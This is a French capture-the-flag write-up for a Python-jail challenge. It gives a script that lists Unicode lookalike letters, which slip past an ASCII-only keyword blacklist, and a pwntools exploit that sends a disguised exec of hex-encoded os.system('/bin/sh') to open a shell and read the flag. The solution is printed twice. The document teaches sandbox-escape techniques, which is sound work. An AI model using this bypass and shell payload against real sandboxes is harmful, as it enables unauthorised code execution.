Pyjail Revenge

Catégorie: Système Difficulté: - Flag: CTFREI{d4mn_u_g0t_m3_pff}

Challenge

Description

Fini les payloads classiques, montre moi vraiment ce que tu peux faire pour contourner ça !

Le flag est situé dans flag.txt

Connexion: nc intro.ctfrei.fr 4452

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Ici le "TRICK" à utiliser est que python accepte différent encodage, seulement la vérification de la blacklist est faite uniquement avec les valeurs ASCII. On peut donc utiliser des caractères unicodes différents, mais compris par python pour utiliser les mots interdis.

La première chose à faire est de lister, en local, les caractères qui peuvent remplacer les "vrais" (ceux en ASCII). Pour ça on va créer 26 variables nommées de a à z, tester par exemple 1 million de caractères unicode et voir ceux qui sont évalués en tant qu'une des variables définies.

result = {v: [] for v in range(26)}
a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z = list(range(26))

for _n in range(1_000_000):
  _c = chr(_n)
  if _c.isdigit():
    continue
  try:
    _v = eval(_c)
    result[_v].append(_c)
  except:
    pass

for _v in range(26):
  print(', '.join(result[_v]))

On en tire le tableau de correspondances suivant :

a, ª, ᵃ, ₐ, ａ, 𝐚, 𝑎, 𝒂, 𝒶, 𝓪, 𝔞, 𝕒, 𝖆, 𝖺, 𝗮, 𝘢, 𝙖, 𝚊
b, ᵇ, ｂ, 𝐛, 𝑏, 𝒃, 𝒷, 𝓫, 𝔟, 𝕓, 𝖇, 𝖻, 𝗯, 𝘣, 𝙗, 𝚋
c, ᶜ, ⅽ, ｃ, 𝐜, 𝑐, 𝒄, 𝒸, 𝓬, 𝔠, 𝕔, 𝖈, 𝖼, 𝗰, 𝘤, 𝙘, 𝚌
d, ᵈ, ⅆ, ⅾ, ｄ, 𝐝, 𝑑, 𝒅, 𝒹, 𝓭, 𝔡, 𝕕, 𝖉, 𝖽, 𝗱, 𝘥, 𝙙, 𝚍
e, ᵉ, ₑ, ℯ, ⅇ, ｅ, 𝐞, 𝑒, 𝒆, 𝓮, 𝔢, 𝕖, 𝖊, 𝖾, 𝗲, 𝘦, 𝙚, 𝚎
f, ᶠ, ｆ, 𝐟, 𝑓, 𝒇, 𝒻, 𝓯, 𝔣, 𝕗, 𝖋, 𝖿, 𝗳, 𝘧, 𝙛, 𝚏
g, ᵍ, ℊ, ｇ, 𝐠, 𝑔, 𝒈, 𝓰, 𝔤, 𝕘, 𝖌, 𝗀, 𝗴, 𝘨, 𝙜, 𝚐
h, ʰ, ₕ, ℎ, ｈ, 𝐡, 𝒉, 𝒽, 𝓱, 𝔥, 𝕙, 𝖍, 𝗁, 𝗵, 𝘩, 𝙝, 𝚑
i, ᵢ, ⁱ, ℹ, ⅈ, ⅰ, ｉ, 𝐢, 𝑖, 𝒊, 𝒾, 𝓲, 𝔦, 𝕚, 𝖎, 𝗂, 𝗶, 𝘪, 𝙞, 𝚒
j, ʲ, ⅉ, ⱼ, ｊ, 𝐣, 𝑗, 𝒋, 𝒿, 𝓳, 𝔧, 𝕛, 𝖏, 𝗃, 𝗷, 𝘫, 𝙟, 𝚓
k, ᵏ, ₖ, ｋ, 𝐤, 𝑘, 𝒌, 𝓀, 𝓴, 𝔨, 𝕜, 𝖐, 𝗄, 𝗸, 𝘬, 𝙠, 𝚔
l, ˡ, ₗ, ℓ, ⅼ, ｌ, 𝐥, 𝑙, 𝒍, 𝓁, 𝓵, 𝔩, 𝕝, 𝖑, 𝗅, 𝗹, 𝘭, 𝙡, 𝚕
m, ᵐ, ₘ, ⅿ, ｍ, 𝐦, 𝑚, 𝒎, 𝓂, 𝓶, 𝔪, 𝕞, 𝖒, 𝗆, 𝗺, 𝘮, 𝙢, 𝚖
n, ⁿ, ₙ, ｎ, 𝐧, 𝑛, 𝒏, 𝓃, 𝓷, 𝔫, 𝕟, 𝖓, 𝗇, 𝗻, 𝘯, 𝙣, 𝚗
o, º, ᵒ, ₒ, ℴ, ｏ, 𝐨, 𝑜, 𝒐, 𝓸, 𝔬, 𝕠, 𝖔, 𝗈, 𝗼, 𝘰, 𝙤, 𝚘
p, ᵖ, ₚ, ｐ, 𝐩, 𝑝, 𝒑, 𝓅, 𝓹, 𝔭, 𝕡, 𝖕, 𝗉, 𝗽, 𝘱, 𝙥, 𝚙
q, ｑ, 𐞥, 𝐪, 𝑞, 𝒒, 𝓆, 𝓺, 𝔮, 𝕢, 𝖖, 𝗊, 𝗾, 𝘲, 𝙦, 𝚚
r, ʳ, ᵣ, ｒ, 𝐫, 𝑟, 𝒓, 𝓇, 𝓻, 𝔯, 𝕣, 𝖗, 𝗋, 𝗿, 𝘳, 𝙧, 𝚛
s, ſ, ˢ, ₛ, ｓ, 𝐬, 𝑠, 𝒔, 𝓈, 𝓼, 𝔰, 𝕤, 𝖘, 𝗌, 𝘀, 𝘴, 𝙨, 𝚜
t, ᵗ, ₜ, ｔ, 𝐭, 𝑡, 𝒕, 𝓉, 𝓽, 𝔱, 𝕥, 𝖙, 𝗍, 𝘁, 𝘵, 𝙩, 𝚝
u, ᵘ, ᵤ, ｕ, 𝐮, 𝑢, 𝒖, 𝓊, 𝓾, 𝔲, 𝕦, 𝖚, 𝗎, 𝘂, 𝘶, 𝙪, 𝚞
v, ᵛ, ᵥ, ⅴ, ｖ, 𝐯, 𝑣, 𝒗, 𝓋, 𝓿, 𝔳, 𝕧, 𝖛, 𝗏, 𝘃, 𝘷, 𝙫, 𝚟
w, ʷ, ｗ, 𝐰, 𝑤, 𝒘, 𝓌, 𝔀, 𝔴, 𝕨, 𝖜, 𝗐, 𝘄, 𝘸, 𝙬, 𝚠
x, ˣ, ₓ, ⅹ, ｘ, 𝐱, 𝑥, 𝒙, 𝓍, 𝔁, 𝔵, 𝕩, 𝖝, 𝗑, 𝘅, 𝘹, 𝙭, 𝚡
y, ʸ, ｙ, 𝐲, 𝑦, 𝒚, 𝓎, 𝔂, 𝔶, 𝕪, 𝖞, 𝗒, 𝘆, 𝘺, 𝙮, 𝚢
z, ᶻ, ｚ, 𝐳, 𝑧, 𝒛, 𝓏, 𝔃, 𝔷, 𝕫, 𝖟, 𝗓, 𝘇, 𝘻, 𝙯, 𝚣

Maintenant, il suffit de remplacer une lettre de exec pour que la blacklist ne détecte plus le mot, mais qu'il soit toujours interprété. Remplaçons par exemple le premier e par 𝕖.

Ensuite, on va créer un payload qui ouvrira un shell dans notre fonction exec. Pour passer la blacklist sans se prendre la tête, on va envoyer une version encodée en hexa et qui sera décodée sur le serveur avec bytes.fromhex.

from pwn import remote, context

context.log_level = 'error'

client = remote('intro.ctfrei.fr', 4452)
to_exec_hex = '__import__("os").system("/bin/sh")'.encode().hex()
payload = f'𝕖xec(bytes.fromhex(\'{to_exec_hex}\').decode())'
client.sendlineafter(b'>>> ', payload.encode())

client.sendline(b'cat flag.txt')
print(client.recvall(timeout=1))
# CTFREI{d4mn_u_g0t_m3_pff}

client.close()

PrécédentPyjail SuivantStrange input, right?

Dernière mise à jour il y a 7 mois

Cet article vous a-t-il été utile ?

Solution

result = {v: [] for v in range(26)}
a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z = list(range(26))

for _n in range(1_000_000):
  _c = chr(_n)
  if _c.isdigit():
    continue
  try:
    _v = eval(_c)
    result[_v].append(_c)
  except:
    pass

for _v in range(26):
  print(', '.join(result[_v]))

On en tire le tableau de correspondances suivant :

a, ª, ᵃ, ₐ, ａ, 𝐚, 𝑎, 𝒂, 𝒶, 𝓪, 𝔞, 𝕒, 𝖆, 𝖺, 𝗮, 𝘢, 𝙖, 𝚊
b, ᵇ, ｂ, 𝐛, 𝑏, 𝒃, 𝒷, 𝓫, 𝔟, 𝕓, 𝖇, 𝖻, 𝗯, 𝘣, 𝙗, 𝚋
c, ᶜ, ⅽ, ｃ, 𝐜, 𝑐, 𝒄, 𝒸, 𝓬, 𝔠, 𝕔, 𝖈, 𝖼, 𝗰, 𝘤, 𝙘, 𝚌
d, ᵈ, ⅆ, ⅾ, ｄ, 𝐝, 𝑑, 𝒅, 𝒹, 𝓭, 𝔡, 𝕕, 𝖉, 𝖽, 𝗱, 𝘥, 𝙙, 𝚍
e, ᵉ, ₑ, ℯ, ⅇ, ｅ, 𝐞, 𝑒, 𝒆, 𝓮, 𝔢, 𝕖, 𝖊, 𝖾, 𝗲, 𝘦, 𝙚, 𝚎
f, ᶠ, ｆ, 𝐟, 𝑓, 𝒇, 𝒻, 𝓯, 𝔣, 𝕗, 𝖋, 𝖿, 𝗳, 𝘧, 𝙛, 𝚏
g, ᵍ, ℊ, ｇ, 𝐠, 𝑔, 𝒈, 𝓰, 𝔤, 𝕘, 𝖌, 𝗀, 𝗴, 𝘨, 𝙜, 𝚐
h, ʰ, ₕ, ℎ, ｈ, 𝐡, 𝒉, 𝒽, 𝓱, 𝔥, 𝕙, 𝖍, 𝗁, 𝗵, 𝘩, 𝙝, 𝚑
i, ᵢ, ⁱ, ℹ, ⅈ, ⅰ, ｉ, 𝐢, 𝑖, 𝒊, 𝒾, 𝓲, 𝔦, 𝕚, 𝖎, 𝗂, 𝗶, 𝘪, 𝙞, 𝚒
j, ʲ, ⅉ, ⱼ, ｊ, 𝐣, 𝑗, 𝒋, 𝒿, 𝓳, 𝔧, 𝕛, 𝖏, 𝗃, 𝗷, 𝘫, 𝙟, 𝚓
k, ᵏ, ₖ, ｋ, 𝐤, 𝑘, 𝒌, 𝓀, 𝓴, 𝔨, 𝕜, 𝖐, 𝗄, 𝗸, 𝘬, 𝙠, 𝚔
l, ˡ, ₗ, ℓ, ⅼ, ｌ, 𝐥, 𝑙, 𝒍, 𝓁, 𝓵, 𝔩, 𝕝, 𝖑, 𝗅, 𝗹, 𝘭, 𝙡, 𝚕
m, ᵐ, ₘ, ⅿ, ｍ, 𝐦, 𝑚, 𝒎, 𝓂, 𝓶, 𝔪, 𝕞, 𝖒, 𝗆, 𝗺, 𝘮, 𝙢, 𝚖
n, ⁿ, ₙ, ｎ, 𝐧, 𝑛, 𝒏, 𝓃, 𝓷, 𝔫, 𝕟, 𝖓, 𝗇, 𝗻, 𝘯, 𝙣, 𝚗
o, º, ᵒ, ₒ, ℴ, ｏ, 𝐨, 𝑜, 𝒐, 𝓸, 𝔬, 𝕠, 𝖔, 𝗈, 𝗼, 𝘰, 𝙤, 𝚘
p, ᵖ, ₚ, ｐ, 𝐩, 𝑝, 𝒑, 𝓅, 𝓹, 𝔭, 𝕡, 𝖕, 𝗉, 𝗽, 𝘱, 𝙥, 𝚙
q, ｑ, 𐞥, 𝐪, 𝑞, 𝒒, 𝓆, 𝓺, 𝔮, 𝕢, 𝖖, 𝗊, 𝗾, 𝘲, 𝙦, 𝚚
r, ʳ, ᵣ, ｒ, 𝐫, 𝑟, 𝒓, 𝓇, 𝓻, 𝔯, 𝕣, 𝖗, 𝗋, 𝗿, 𝘳, 𝙧, 𝚛
s, ſ, ˢ, ₛ, ｓ, 𝐬, 𝑠, 𝒔, 𝓈, 𝓼, 𝔰, 𝕤, 𝖘, 𝗌, 𝘀, 𝘴, 𝙨, 𝚜
t, ᵗ, ₜ, ｔ, 𝐭, 𝑡, 𝒕, 𝓉, 𝓽, 𝔱, 𝕥, 𝖙, 𝗍, 𝘁, 𝘵, 𝙩, 𝚝
u, ᵘ, ᵤ, ｕ, 𝐮, 𝑢, 𝒖, 𝓊, 𝓾, 𝔲, 𝕦, 𝖚, 𝗎, 𝘂, 𝘶, 𝙪, 𝚞
v, ᵛ, ᵥ, ⅴ, ｖ, 𝐯, 𝑣, 𝒗, 𝓋, 𝓿, 𝔳, 𝕧, 𝖛, 𝗏, 𝘃, 𝘷, 𝙫, 𝚟
w, ʷ, ｗ, 𝐰, 𝑤, 𝒘, 𝓌, 𝔀, 𝔴, 𝕨, 𝖜, 𝗐, 𝘄, 𝘸, 𝙬, 𝚠
x, ˣ, ₓ, ⅹ, ｘ, 𝐱, 𝑥, 𝒙, 𝓍, 𝔁, 𝔵, 𝕩, 𝖝, 𝗑, 𝘅, 𝘹, 𝙭, 𝚡
y, ʸ, ｙ, 𝐲, 𝑦, 𝒚, 𝓎, 𝔂, 𝔶, 𝕪, 𝖞, 𝗒, 𝘆, 𝘺, 𝙮, 𝚢
z, ᶻ, ｚ, 𝐳, 𝑧, 𝒛, 𝓏, 𝔃, 𝔷, 𝕫, 𝖟, 𝗓, 𝘇, 𝘻, 𝙯, 𝚣

Maintenant, il suffit de remplacer une lettre de exec pour que la blacklist ne détecte plus le mot, mais qu'il soit toujours interprété. Remplaçons par exemple le premier e par 𝕖.

from pwn import remote, context

context.log_level = 'error'

client = remote('intro.ctfrei.fr', 4452)
to_exec_hex = '__import__("os").system("/bin/sh")'.encode().hex()
payload = f'𝕖xec(bytes.fromhex(\'{to_exec_hex}\').decode())'
client.sendlineafter(b'>>> ', payload.encode())

client.sendline(b'cat flag.txt')
print(client.recvall(timeout=1))
# CTFREI{d4mn_u_g0t_m3_pff}

client.close()